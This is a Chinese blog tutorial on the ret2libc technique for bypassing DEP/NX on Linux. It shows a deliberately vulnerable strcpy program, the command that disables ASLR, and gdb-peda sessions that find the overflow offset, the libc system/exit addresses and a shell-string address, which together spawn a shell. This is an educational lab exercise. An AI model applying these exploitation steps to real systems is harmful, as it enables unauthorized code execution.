linux中ret2libc入门与实践

最新推荐文章于 2024-07-11 14:43:09 发布
最新推荐文章于 2024-07-11 14:43:09 发布
阅读量6.8k 收藏 25
点赞数 12
分类专栏: 安全漏洞 二进制安全 文章标签: ret2libc linux DEP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/counsellor/article/details/81986052
版权

前言

本来想找一个windows下的栈溢出漏洞的poc作为漏洞分析路程的开篇,但是一路走来遇到了太多的问题,大大小小,什么都有。同时因为工作事情比较多,能拿出来调试和写文章的时间也是断断续续。昨天刚有一点心得,今天就忘了一大半,同时会推翻自己之前的结论。

经过漫长的求证过程,打算把NX利剑-ret2libc这种方法和其原理用简单直接的方式展示出来。

简介

DEP-数据执行保护(Data Execution Prevention).这是一套软硬件技术,能够在内存上执行额外检查以帮助防止在栈上执行恶意代码。其基本原理是将数据所在的内存页标识为不可执行,当缓冲区溢出成功跳转到shellcode时,程序会尝试在数据页面上执行指令,此时CPU就会抛出异常,而不会执行恶意质量

return-to-libc 是一种对抗linux系统栈保护的攻击方法。我们知道大部分linux系统有栈保护机制(DEP)。简单的说,既然栈中的指令不能执行,我们可以找到libc中的函数去执行,这样就绕过了数据不可执行的问题了。

后面都将用ret2libc作为return-to-libc的简写表示。

攻击原理

通过把函数返回地址直接指向系统库中的函数(如system函数),同时构造该函数的输入参数栈,就可以达到代码执行的目的。

正常堆栈布局:
这里写图片描述

ret2libc执行system的堆栈布局:
这里写图片描述

这样我们就获得了攻击payload的布局结构:

A*N + system_addr + fake_ret + system_arg

这里放一个迷惑LZ很多天的溢出堆栈的布局:
这里写图片描述

第一段是说栈溢出,覆盖EIP跳转到shellcode位置执行;
第二段是说使用ret2libc执行system函数。

看出问题了吗?

system地址居然在EBP的位置。他丫的,颠覆三观有没有。EBP是记录栈底位置的,那不成要把程序的调用栈置换到代码区不成。

布局图片引用自mit的csail,明眼的人估计一看mit就亮了。他丫的,这可是麻省理工学院 计算机科学与人工智能实验室的paper。居然有这么大的错误。让我这种半瓶醋如何是好。传送门在此

环境

➜  ~ uname -a
Linux ubuntu 4.4.0-133-generic #159-Ubuntu SMP Fri Aug 10 07:31:43 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
➜  ~ gdb -v
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1

➜  ~ pip show peda 
Name: peda
Version: 1.0
Summary: Python Exploit Development Assistance for GDB
Home-page: https://github.com/longld/peda
Author: Long Le Dinh
Author-email: longld@vnsecurity.net
License: Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License
Location: /usr/local/lib/python2.7/dist-packages

源码

这里是ret2libc测试用的源码,攻击payload在命令行输入。


#include <stdio.h>    
#include <string.h>    

void evilfunction(char *input) {    

    char buffer[512];    
    strcpy(buffer, input);    
}    

int main(int argc, char **argv) {    

    evilfunction(argv[1]);    

    return 0;    
}

payload为什么要在命令行输入?

因为system的参数“/bin/sh”这段字符串的地址会动态变化,需要手动捞出来之后在输入。当然还有额外的效果,就是源码简洁,攻击过程直观。

编译 & 关闭ASLR

编译

$ gcc -Wall -g -o stack3 stack3.c -fno-stack-protector -m32

关闭ASLR

# echo 0 > /proc/sys/kernel/randomize_va_space

需要解决的问题

根据上面的paylload结构,可以知道我们需要填充的有:

  1. 需要填充多少个A,或者说system地址从多少A后面开始写。
  2. system地址是多少?
  3. exit地址是多少?你可能会问说好的fake ret怎么变成exit地址了?因为exit函数可以清理被破坏的栈,导致程序不会崩溃。其实,在我看来填什么都行。
  4. system函数的执行参数“/bin/sh”这个字符串地址是多少?

运行

  1. 下断点,找到system和exit函数的地址
➜  test_execve gdb stack3 
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from stack3...done.
gdb-peda$ b evilfunction 
Breakpoint 1 at 0x8048414: file a.c, line 8.

这里写图片描述

这样我们就知道了
system函数地址:0xf7e3f940
exit函数地址:0xf7e337b0
2. 找到evilfunction函数的ret位置
因为evilfunction中buffer声明的大小是512字节,所以我们用来溢出的字符串长度必然大于512.
这里通过peda工具计算ret的位置。

生成长度为530的字符串

gdb-peda$ pattern_create 530
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6AsLAshAs7AsMAsiAs8AsNAsjAs9AsOA'

作为输入参数运行

gdb-peda$ r 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6AsLAshAs7AsMAsiAs8AsNAsjAs9AsOA'
Starting program: /home/test/tmp/test_execve/stack3 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6AsLAshAs7AsMAsiAs8AsNAsjAs9AsOA'

程序崩溃,找到EIP寄存器中的字符串’s9As’,即为ret-我们需要的返回地址。

Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
EAX: 0xffffc980 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA"...)
EBX: 0x0 
ECX: 0xffffd0b0 --> 0x414f73 ('sOA')
EDX: 0xffffcb8f --> 0x414f73 ('sOA')
ESI: 0xf7fb5000 --> 0x1afdb0 
EDI: 0xf7fb5000 --> 0x1afdb0 
EBP: 0x416a7341 ('AsjA')
ESP: 0xffffcb90 --> 0xff00414f 
EIP: 0x73413973 ('s9As')
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x73413973
[------------------------------------stack-------------------------------------]
0000| 0xffffcb90 --> 0xff00414f 
0004| 0xffffcb94 --> 0xffffcc54 --> 0xffffce7f ("/home/test/tmp/test_execve/stack3")
0008| 0xffffcb98 --> 0xffffcc60 --> 0xffffd0b4 ("GNOME_KEYRING_PID=")
0012| 0xffffcb9c --> 0x8048481 (<__libc_csu_init+33>:   lea    eax,[ebx-0xf8])
0016| 0xffffcba0 --> 0xf7fb53dc --> 0xf7fb61e0 --> 0x0 
0020| 0xffffcba4 --> 0xffffcbc0 --> 0x2 
0024| 0xffffcba8 --> 0x0 
0028| 0xffffcbac --> 0xf7e1d637 (<__libc_start_main+247>:   add    esp,0x10)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x73413973 in ?? ()

计算ret偏移,得到524,所以我们要填充524个A。

gdb-peda$ pattern_
pattern_arg     pattern_create  pattern_env     pattern_offset  pattern_patch   pattern_search  
gdb-peda$ pattern_offset s9As
s9As found at offset: 524
  1. “/bin/sh”的地址

这里感觉比较巧妙,正常我们可以用自己过早的字符串放进去,但是,这样的话我们还得动态计算我们字符串的地址。ret2libc使用环境变量中的“/bin/sh”字符串作为参数。需要注意的是,环境变量的地址会动态变化,记得老外的文章中提过,每运行一次,好像地址会增加几个字节。

我的shell是zsh,所以在环境变量中找zsh就好了。

gdb-peda$  x/500s $esp
...
...
cf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.o"...
0xffffdbf4: "gv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;3"...
0xffffdcbc: "6:*.xspf=00;36:"
0xffffdccc: "SSH_AUTH_SOCK=/run/user/1000/keyring/ssh"
0xffffdcf5: "XDG_GREETER_DATA_DIR=/var/lib/lightdm-data/test"
0xffffdd25: "SHELL=/bin/zsh"
0xffffdd34: "TERMINATOR_UUID=urn:uuid:773f4dc6-e568-4861-9206-7a07da238c4a"
0xffffdd72: "LC_NAME=zh_CN.UTF-8"
0xffffdd86: "GDMSESSION=ubuntu"
0xffffdd98: "QT_ACCESSIBILITY=1"

得到字符串”SHELL=/bin/zsh”的地址:0xffffdd25

进一步计算”/bin/zsh”的地址:

gdb-peda$ p 0xffffdd25+6
$1 = 0xffffdd2b

“/bin/zsh”的地址:0xffffdd2b

汇总

‘A’ * 524
0xf7e3f940 system
0xf7e337b0 exit
0xffffdd2b /bin/sh

攻击

运行命令:

gdb-peda$ r $(cat arg)
Starting program: /home/test/tmp/test_execve/stack3 $(cat arg)

这里写图片描述

在调用出来的zsh中我们可以运行各种命令,但是使用exit退出时,发现会卡住。理论上会完美推出的,结果这个样纸。原因还不明,有时间再查查。

总结

这个程序的成功执行得利于关闭ASLR,system和exit函数的地址才能固定下来。我们构造poc才方便很多。

ret2libc的精髓之处在于,把ret addr修改成libc库中的函数地址,并且构造了system函数的参数。对于DEP防御来说,你不让我执行我的代码,我就利用你的函数达到我的目的。这边是面向返回编程的设计思路。

这里写图片描述

参考文献

https://www.shellblade.net/docs/ret2libc.pdf
https://www.exploit-db.com/docs/english/28553-linux-classic-return-to-libc-&-return-to-libc-chaining-tutorial.pdf
https://www.exploit-db.com/papers/13147/
https://blog.csdn.net/guilanl/article/details/61921481
https://blog.csdn.net/linyt/article/details/43643499
https://blog.csdn.net/linyt/article/details/48738757
https://blog.csdn.net/huqinwei987/article/details/23548239
https://pdfs.semanticscholar.org/presentation/ead2/ed949c8d3933d956868d092c8fc29f626ec2.pdf
https://blog.csdn.net/tzh_linux/article/details/50842814
https://exploit.courses/files/bfh2017/day4/0x51_ExploitMitigations.pdf

counsellor
关注
  • 12
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Linux PWN从入门到熟练
墨痕诉清风的博客
07-19 1763
最近在复习pwn的一些知识。主要涉及到当堆栈开启了保护的时候,我们不能够直接将shellcode覆盖到堆栈执行,而需要利用程序其他部分的可执行的小片段来连接成最终的shellcode。此小片段就是gadgets。本文主要通过练习题的方式讲述如何寻找gadgets,如何利用现有的工具来加速自己的pwn的效率。Gadgets的类型和难度也逐步变化。下面带来手把手教你linux pwn。让你的pwn技术从入门到熟练。练习题的难度逐步加大。
Linux之GCC入门学习
小星雪的博客
03-17 544
GCC编译器GNU CC(简称为 Gcc)是 GNU 项目符合 ANSI C 标准的编译系统,能够编译用 C、C++和 Object C 等语言编写的程序。 Gcc 支持编译源文件的后缀及其解释: Gcc编译流程解析gcc的编译流程分为4个步骤,分别为: 预处理(Pre-Processing) 编译(Compiling) 汇编(Assembling) 链接(Linking) 通过简单示例,了解
ret2libc
huzai9527的博客
02-03 459
1. buooj - ciscn_2019_c_1(64 位) from pwn import * #p = remote('node3.buuoj.cn',28190) p = process('./ciscn_2019_c_1') context.log_level = 'debug' puts_plt = 0x4006e0 puts_got = 0x602020 gets_got = 0x602050 pop_rdi = 0x0000000000400c83 main = 0x4009a0 #ste
ret2csu简单总结
最新发布
ULGANOY的博客
07-11 824
对于ret2csu的学习总结。
Ret2libc
iextract的博客
04-24 661
昨晚同学问了关于ret2libc时参数布置的问题,今天在此记录 假设熟悉stack overflow Ps:ret2libc是为了对抗DEP/NX产生 栈的布置在说明ret2libc之前,栈的布置需要提前说明一下,以以下简单代码为例#include <stdio.h>int trap(int x) { int y=0; y+=x; return y; }int m
pwn小白入门06--ret2libc
weixin_45943522的博客
10-25 8245
概述: 前文介绍了ROP的基本原理,但前面的方法有一些局限性,一旦目标程序调用的函数较少,或者使用动态编译,就会导致我们可以利用的gadget变少,从而无法达到利用效果。为了解决这种问题,我们可以选择使用ROP的方式,到动态链接库里面寻找gadget。即ret2libc。 动态链接库: 说动态链接库之前,先简单介绍一下库,库是一种软件组件技术,库里面封装了数据和函数,比如常用的printf,get函数。前文所说的ret2syscall所使用的程序是静态链接的,即在程序编译的时候就将整个库链接到程序,一般这
Linux设置bypass网卡,Linux pwn入门教程(7)——PIE与bypass思路
weixin_34524593的博客
05-07 1318
作者:Tangerine@SAINTSEC0x00 PIE简介在之前的文章我们提到过ASLR这一防护技术。由于受到堆栈和libc地址可预测的困扰,ASLR被设计出来并得到广泛应用。因为ASLR技术的出现,攻击者在ROP或者向进程写数据时不得不先进行leak,或者干脆放弃堆栈,转向bss或者其他地址固定的内存块。而PIE(position-independent executable, 地址无关...
3.pwn入门新手做无system泄露libc.so版本攻防世界pwn100 pwn200(dynelf 、libsearcher与got表plt表解)
qiudalaojiao的博客
02-12 2019
第一步:基地址 = 实际地址(泄露的got地址) – libc对应函数的偏移 第二部:目的函数地址 = 基地址 + libc对应函数的偏移 Dynelf 查找函数地址的典型方法是从泄漏的同一个库的另一个函数的地址计算到所需函数的偏移量,然而,要使这种方法有效地工作,gLibc的远程服务器版本需要与我们的相同。我们还可以通过泄漏一些函数并在libcdb.com搜索找到gLibc的远程版本,但...
ret2libc exploit
07-07
exploit hack linux ret2libc
ret2libc攻击原理+实例分析
yajuanpi4899的博客
11-09 4029
ret2libc攻击方式针对动态链接(Dynamic linking) 编译的程序,静态链接一般利用ROP能简单构造出payload进行攻击(详见ROP博客)。一般情况下无法在程序直接找到system、execve这一类系统函数,动态链接 ...
栈溢出实例--笔记三(ret2libc
一只青木呀
08-07 1401
栈溢出实例--笔记三(ret2libc)1、栈溢出含义及栈结构2、ret2libc基本思路3、实战3.1、二进制程序如下3.2、查看栈结构3.3、第一次栈溢出3.4、第二次栈溢出 1、栈溢出含义及栈结构 请参考栈溢出实例–笔记一(ret2text) 栈溢出实例–笔记二(ret2shellcode) 2、ret2libc基本思路 在当一个程序开启了NX(栈不可执行)的时候,我们没办法去写shellcode,而且程序也没有system函数供我们调用的时候,那此时我们该如何做呢? 首先,程序本身没有system
实验三——ret2libc3地址泄露
wwh的博客
04-22 1962
用【checksec】查看:不存在必要的保护 查看got表信息:【readelf -r ret2libc3】 所以我决定用泄露 __libc_strart_main 的地址,来判定libc的版本 这里插入代码 from pwn import * from LibcSearcher import * context.log_level='debug' context.terminal=['gn...
Ret2libc 1
weixin_44864859的博客
05-19 724
Ret2libc 1 题目代码和之前一样,gets函数存在栈溢出。同时也存在system函数,但是不同之处是我们不能直接跳转到system(“shell!?”)。因为我们要执行的是system(“bin/sh”)。 首先,我们可以在内存搜索一下看有没有这个字符串 我们可以看到在0x8049720存在我们需要的字符串 那么,我们直接返回该处,即执行 system 函数。相应的 payload 如下 from pwn import * sh = process('./ret2libc1') binsh_
pwn ret2libc原理
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序的栈溢出漏洞,来控制程序的执行流程,以达到执行libc的函数的目的。 在ret2libc攻击,程序会调用libc的函数,例如system函数,来执行特定的操作。但是在程序没有自带的/bin/sh字符串,所以需要通过其他方式获取执行shell命令的能力。 具体而言,攻击者会利用程序的栈溢出漏洞,将栈上的返回地址修改为在libc的某个函数的地址,例如puts函数。然后通过执行puts函数,将栈上保存的函数地址打印出来。由于libc的函数地址相对位置是不变的,攻击者可以根据已知的函数地址和libc的版本来计算system函数的真实地址。然后再利用system函数执行特定的操作,比如执行shell命令。 总结来说,pwn ret2libc攻击的原理是通过栈溢出漏洞修改返回地址为libc的一个函数地址,然后根据已知的函数地址和libc的版本计算出system函数的真实地址,最终实现执行shell命令的目的。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [pwn学习——ret2libc2](https://blog.csdn.net/MrTreebook/article/details/121595367)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [pwn小白入门06--ret2libc](https://blog.csdn.net/weixin_45943522/article/details/120469196)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值